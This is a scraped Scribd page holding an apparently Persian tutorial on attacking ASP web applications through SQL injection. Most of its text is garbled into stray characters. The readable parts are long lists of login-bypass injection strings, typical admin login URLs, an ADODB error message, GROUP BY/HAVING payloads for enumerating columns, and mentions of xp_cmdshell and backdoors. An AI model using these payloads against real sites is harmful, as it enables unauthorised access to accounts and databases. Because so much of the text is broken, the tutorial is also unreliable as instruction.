Scribd
Upload
24 views15 pages

ASP Injection

asp learning

Uploaded by

me
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
24 views15 pages

ASP Injection

asp learning

Uploaded by

me
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

+

7 * ' 4 6
0

?# @ /

asp.net
#

asp.net
07 8 9 :
=

4 / 56

!
1

23 4

" #$ % &

) * >) *

)*

<* = ) 9 ( *

? 1

-- :

/ /

) *

0*

# :1 ;
-& <

web application
-.
'
()*
+, & "
!
/ ()*
2 5 6!
2
3
;%
<
%

'(

#$

< 1 -8
<!
ABC6

#
%0.
-

-,

1.
4%5
.

$ %
/
" 1 -=
! -.

0>
@ <xssBA
Xss

0%5
#

2 1

; E # ! ;
6 ()* $N #
N
:-

Cross site scripting


C3 :
? D 0%5
E # ;
2
1
script : G H
? F
!
9
Sql Injection BI
F Sql 8
J )
0K.
. E #
' ) < O
P !
' 5 L
M
N
!
-; H = 1
. -.
5 - . < - . -?
@ ? ?
) $ sql 4%5
Q <

http://planetsecurity.persiangig.com/My%20Sql%20Injection%20Full.rar
&0$

0$) 1

R, <- S

sql

7 8 >%

N #

!<- -?" asp


:
%? 8 >
N #
) N #
#
- . -? %
.
1
0/
! - ,
#
;
-?" %? <' )
F .7 0 ' T ; F
0 ' asp 4%5
$ %
.
login page G 6
0%5
7
N # S
!
.
$ % < Login page
#
7 password username
@ ?
?#
U , # C V T 1 -W !
/

%?
url G 6
5
! ; -? P
8
0 ' 1"
-,
/
., 8

8
1

Site.com/login.asp
Site.com/admin/login.asp
Site.com/admin.asp
And

" %P

%? Q

%?

#
%?

'
'User
'Pass
'PAss
';user
Pass;',
And

.
error

+, &

Q
: !

%?

%P
0%5 Q -

%?
+, & " %? J

-)

.
error %?
@ -

#
C
0>

ADODB.Field error '800a0bcd'


Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/day/page/2211/result.asp, line 61

%
! - 1

6 ?
8

Y - 3
%.9

5
#

+, & " %?
-) error # &/
%? !Z ? ?
-?" inject

5
@ -

or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
'or''='
'or'a'='a
admin'-admin' or 1=1 -' or 1=1
' or 0=0 -admin" or "a"=a
admin" or 1=1 -admin' or 'a'='a
admin') or ('a'='a
or 0=0 -' or 0=0 #
hi' or 1=1-hi" or 1=1-hi" or "a"="a
") or ("a"="a
') or ('a'='a
" or "a"="a
hi") or ("a"="a
hi') or ('a'='a
" or 0=0 #

8 1 ; %?
?

-, V -

: 8 > \5<
., 8

/ +, &
! . U,#C 1
#? 1
F-

[ '
# 1
: %?

" or 1=1-') or ('x'='x


or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1 -admin' or 1=1 -admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)-admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1--

' or a=a-" or "a"="a


') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
DUMMYPASSWORD' OR 1=1 -' or 1=1-" or 1=1-or 1=1-' or 'a'='a
" or "a"="a

-, V # 1
%? - -) -' ) U , #
' or 1=1 T
#
?
DF
1
.
#
<
R,
^) 5
9 P
<
#
# %
.,
. admin 4T
-_
O
? % 9<
# <O 8
D ! .,
8 ` <
? ! 0%W 1 ;
-D
8F
#
! ) E
# 8 1
E !
-? 1
T
. ? 8 E
@ .
#

-;
%? %
., 8
%.9

C
\

<

R,
1 P 8 >
column #

#
D ! ?
0 ' ]N'
8 %?
?
%?
? D 0%W
?
table

' having 1=1--

@ ?

Mname_subject,doc

#%0

D #

<

%?

# 1

R,

-D

$ %

#%0 #

<

@<-

doc

D #

<

) #%0

mname_subject
!
9,: P
D 1

' group by Mname_subject,doc having 1=1--

[ '

<

#%0

D <

Mname_tittle,test

@ <

a,

R,

' group by Mname_subject,doc, Mname_tittle,test having 1=1--

!< O error O
@8

c*

-?

b- %

!
""!

%%&

b>

<

; e>;

'

1d

#$#$#$

) F-

., <

1 %P'

*+

fff

Q
#

D <
fff

D
@<

#%0
a,

R,

#$#$
.

fff < O g ,

<fff

N 1

# $#$
)

' 0.1* 0.1.2. *

-?

# $#$

' 0.1*

8%

.,

., 1

.,
/

[ W

:-

., H7

45 6 7 )

i
9;1 &9

@ . #%0
.00

admin inf3rnal
' 0.1*

#
3

45 6 7 -

h,
)

%W

45 6 7 )

fff

9'

%%

' 0.1*

., 1 %P'

@<' 0.1*

8 < .

fff 8
)

%%

D 1

. 1*< 1.2 *

. 1*< 1.2 * =

, .00 =

. 1*< 1.2 * =

, 0<;

,!

; '?9 =

/> -

,-

.,
/

h , &b

%
-

.00 !

0.1.2. * )
3

0.1.2. * )

fff

&9 *<1
3

.,

# @//@ -

8 1

0* *1*

h,

0.1.2. * )

fff R

0<;

& >

1.2 *
0<;

1.2 * =

0
0<;

2
0.1.2. * =

@
*
?
;

; * 02

/
!

B>>4> >6
)

C
73

C 1

union

DDE

@ F

* * 1 1;

$'

"

G<;? '

#
HI*<* '

where not in
fff

'*

<

W46 1

convert
,

F:

#%*

#""!

#""

@ -

*
?

; * 02
+

; * 02

a>

# %P

<.

*
?

B>>4> >6

A
!

B>>4> >6

9 )
-

33+

33+

33+

33+

*+

9 )

0 )

J,

$3 +
,

D3 +
JE ,

/3

1G1

33+

=& ,

33+

=& ,

$3 +
'1

J)

backdoor G 6

:
-

33+

=& ,

@ -

*1

'

?. 1*<33+

?. 1*<33+

KJ

- +
K

?. 1*<33+
KJ

?. 1*<33+

,, K

- +
K

?. 1*<33+
KJ

3 + K

?. 1*<33+

?. 1*<33+

3 +

?. 1*<33+

?. 1*<33+

: ]N'

VT

/DJ

+3+3+3+ D$ ,, K

/DJ

/DJ

' *<
3 +

KJ

/DJ

/DJ

3 +

$D/4L5 ,,

KJ
KJ

3 +

/DJ

J?3 + ,,

3 +
C

,, K
!

KJ
K

KJ

/DJ
KJ

KJ

%?

3 +

ftp G 6

- V

%26 : 1

3 +

/DJ

/DJ
/DJ?

3 +

3 +

J?3 +

-=

xp_cmdshell
@

?. 1*<33+

/
'

- +
E

J,

$3 + KD5

'
33+

H
?

=& ,

$3 +

)
$D/ E

KD5

/
$D/

., 8

@
$

N 1

@
$
%%E

E%%E

DF

%%E

E%%E

.,

$
)
E%%E$#D#/#4#L# E%
F

F$#D#/#4
E%%E$#D#/#4#L

#>#>#>#>#>#> 1

E%

@
$

D <

@
$

#%0

%? Q

D :

#%0 1

# -_%

@
$

#%0 1

!!! . 9 1 -_%

' #

"1 ,

\N

Q- 1

You might also like